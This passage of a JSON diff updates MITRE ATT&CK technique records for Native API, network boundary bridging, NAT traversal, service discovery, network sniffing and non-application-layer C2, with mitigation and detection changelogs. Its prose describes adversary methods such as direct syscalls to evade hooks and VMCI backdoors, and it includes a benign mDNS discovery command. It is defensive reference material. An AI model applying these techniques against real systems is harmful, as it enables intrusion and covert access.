+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:29.231000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0246: Detection Strategy for MFA Interception via Input Capture and Smart Card Proxying"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:17.472000+00:00",
+                    "modified": "2026-05-12 15:12:00.627000+00:00",
+                    "name": "Native API",
+                    "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1685).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1106",
+                            "external_id": "T1106"
+                        },
+                        {
+                            "source_name": "MACOS Cocoa",
+                            "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.",
+                            "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1"
+                        },
+                        {
+                            "source_name": "Apple Core Services",
+                            "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020.",
+                            "url": "https://developer.apple.com/documentation/coreservices"
+                        },
+                        {
+                            "source_name": "macOS Foundation",
+                            "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020.",
+                            "url": "https://developer.apple.com/documentation/foundation"
+                        },
+                        {
+                            "source_name": "OutFlank System Calls",
+                            "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.",
+                            "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"
+                        },
+                        {
+                            "source_name": "Redops Syscalls",
+                            "description": "Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.",
+                            "url": "https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls"
+                        },
+                        {
+                            "source_name": "GNU Fork",
+                            "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.",
+                            "url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html"
+                        },
+                        {
+                            "source_name": "CyberBit System Calls",
+                            "description": "Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.",
+                            "url": "https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"
+                        },
+                        {
+                            "source_name": "GLIBC",
+                            "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.",
+                            "url": "https://www.gnu.org/software/libc/"
+                        },
+                        {
+                            "source_name": "LIBC",
+                            "description": "Kerrisk, M. (2016, December 12). libc(7) \u2014 Linux manual page. Retrieved June 25, 2020.",
+                            "url": "https://man7.org/linux/man-pages//man7/libc.7.html"
+                        },
+                        {
+                            "source_name": "Linux Kernel API",
+                            "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.",
+                            "url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html"
+                        },
+                        {
+                            "source_name": "MDSec System Calls",
+                            "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.",
+                            "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/"
+                        },
+                        {
+                            "source_name": "Microsoft CreateProcess",
+                            "description": "Microsoft. (n.d.). CreateProcess function. Retrieved September 12, 2024.",
+                            "url": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa"
+                        },
+                        {
+                            "source_name": "Microsoft Win32",
+                            "description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.",
+                            "url": "https://docs.microsoft.com/en-us/windows/win32/api/"
+                        },
+                        {
+                            "source_name": "Microsoft NET",
+                            "description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.",
+                            "url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework"
+                        },
+                        {
+                            "source_name": "NT API Windows",
+                            "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.",
+                            "url": "https://undocumented.ntinternals.net/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Gordon Long, LegioX/Zoom, asaurusrex",
+                        "Stefan Kanthak",
+                        "Tristan Madani (Cybereason)"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "2.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.627000+00:00\", \"old_value\": \"2026-04-16 19:16:22.540000+00:00\"}}}",
+                    "previous_version": "2.3",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0529: Behavioral Detection of Native API Invocation via Unusual DLL Loads and Direct Syscalls"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 16:08:29.817000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Network Boundary Bridging",
+                    "description": "Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1599",
+                            "external_id": "T1599"
+                        },
+                        {
+                            "source_name": "Kaspersky ThreatNeedle Feb 2021",
+                            "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.",
+                            "url": "https://securelist.com/lazarus-threatneedle/100803/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-16 20:07:53.048000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1037: Filter Network Traffic",
+                            "M1043: Credential Access Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0006: Detection Strategy for Network Boundary Bridging"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-19 16:48:08.241000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "Network Address Translation Traversal",
+                    "description": "Adversaries may bridge network boundaries by modifying a network device\u2019s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they may modify NAT configurations to send traffic between two separated networks, or to obscure their activities.  In network designs that require NAT to function, such modifications enable the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In network designs that do not require NAT, adversaries may use address translation to further obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "defense-impairment"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1599/001",
+                            "external_id": "T1599.001"
+                        },
+                        {
+                            "source_name": "RFC1918",
+                            "description": "IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020.",
+                            "url": "https://tools.ietf.org/html/rfc1918"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Network Devices"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2026-04-16 20:07:52.887000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1027: Password Policies",
+                            "M1032: Multi-factor Authentication",
+                            "M1037: Filter Network Traffic",
+                            "M1043: Credential Access Protection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0163: Detection Strategy for Network Address Translation Traversal"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:43.915000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Network Service Discovery",
+                    "description": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.\n\nWithin macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host\u2019s registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1046",
+                            "external_id": "T1046"
+                        },
+                        {
+                            "source_name": "apple doco bonjour description",
+                            "description": "Apple Inc. (2013, April 23). Bonjour Overview. Retrieved October 11, 2021.",
+                            "url": "https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/NetServices/Introduction.html"
+                        },
+                        {
+                            "source_name": "CISA AR21-126A FIVEHANDS May 2021",
+                            "description": "CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.",
+                            "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a"
+                        },
+                        {
+                            "source_name": "macOS APT Activity Bradley",
+                            "description": "Jaron Bradley. (2021, November 14). What does APT Activity Look Like on macOS?. Retrieved January 19, 2022.",
+                            "url": "https://themittenmac.com/what-does-apt-activity-look-like-on-macos/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Praetorian",
+                        "Aaron Sullivan aka ZerkerEOD"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2025-10-24 17:49:31.494000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1030: Network Segmentation",
+                            "M1031: Network Intrusion Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0376: Behavioral Detection Strategy for Network Service Discovery Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:41.399000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Network Sniffing",
+                    "description": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [Name Resolution Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Stealth](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.\n\nIn cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)\n\nOn network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "credential-access"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1040",
+                            "external_id": "T1040"
+                        },
+                        {
+                            "source_name": "AWS Traffic Mirroring",
+                            "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.",
+                            "url": "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html"
+                        },
+                        {
+                            "source_name": "capture_embedded_packet_on_software",
+                            "description": "Cisco. (2022, August 17). Configure and Capture Embedded Packet on Software. Retrieved July 13, 2022.",
+                            "url": "https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html"
+                        },
+                        {
+                            "source_name": "GCP Packet Mirroring",
+                            "description": "Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.",
+                            "url": "https://cloud.google.com/vpc/docs/packet-mirroring"
+                        },
+                        {
+                            "source_name": "SpecterOps AWS Traffic Mirroring",
+                            "description": "Luke Paine. (2020, March 11). Through the Looking Glass \u2014 Part 1. Retrieved March 17, 2022.",
+                            "url": "https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512"
+                        },
+                        {
+                            "source_name": "Azure Virtual Network TAP",
+                            "description": "Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.",
+                            "url": "https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview"
+                        },
+                        {
+                            "source_name": "Rhino Security Labs AWS VPC Traffic Mirroring",
+                            "description": "Spencer Gietzen. (2019, September 17). Abusing VPC Traffic Mirroring in AWS. Retrieved March 17, 2022.",
+                            "url": "https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/"
+                        },
+                        {
+                            "source_name": "US-CERT-TA18-106A",
+                            "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.",
+                            "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Oleg Kolesnikov, Securonix",
+                        "Tiago Faria, 3CORESec",
+                        "Austin Clark, @c2defense",
+                        "Itamar Mizrahi, Cymptom",
+                        "Eliraz Levi, Hunters"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "IaaS",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-10-24 17:48:36.910000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.7",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1030: Network Segmentation",
+                            "M1032: Multi-factor Authentication",
+                            "M1041: Encrypt Sensitive Information"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0314: Detection Strategy for Network Sniffing Across Platforms"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:10.728000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Non-Application Layer Protocol",
+                    "description": "Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.\n\nIn ESXi environments, adversaries may leverage the Virtual Machine Communication Interface (VMCI) for communication between guest virtual machines and the ESXi host. This traffic is similar to client-server communications on traditional network sockets but is localized to the physical machine running the ESXi host, meaning it does not traverse external networks (routers, switches). This results in communications that are invisible to external monitoring and standard networking tools like tcpdump, netstat, nmap, and Wireshark. By adding a VMCI backdoor to a compromised ESXi host, adversaries may persistently regain access from any guest VM to the compromised ESXi host\u2019s backdoor, regardless of network segmentation or firewall rules in place.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1095",
+                            "external_id": "T1095"
+                        },
+                        {
+                            "source_name": "Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023",
+                            "description": "Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/"
+                        },
+                        {
+                            "source_name": "University of Birmingham C2",
+                            "description": "Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
+                            "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
+                        },
+                        {
+                            "source_name": "Cisco Synful Knock Evolution",
+                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
+                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
+                        },
+                        {
+                            "source_name": "Microsoft ICMP",
+                            "description": "Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.",
+                            "url": "http://support.microsoft.com/KB/170292"
+                        },
+                        {
+                            "source_name": "Cisco Blog Legacy Device Attacks",
+                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
+                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
+                        },
+                        {
+                            "source_name": "Wikipedia OSI",
+                            "description": "Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.",
+                            "url": "http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ryan Becwar",
+                        "Duane Michael"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2025-10-24 17:49:20.136000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
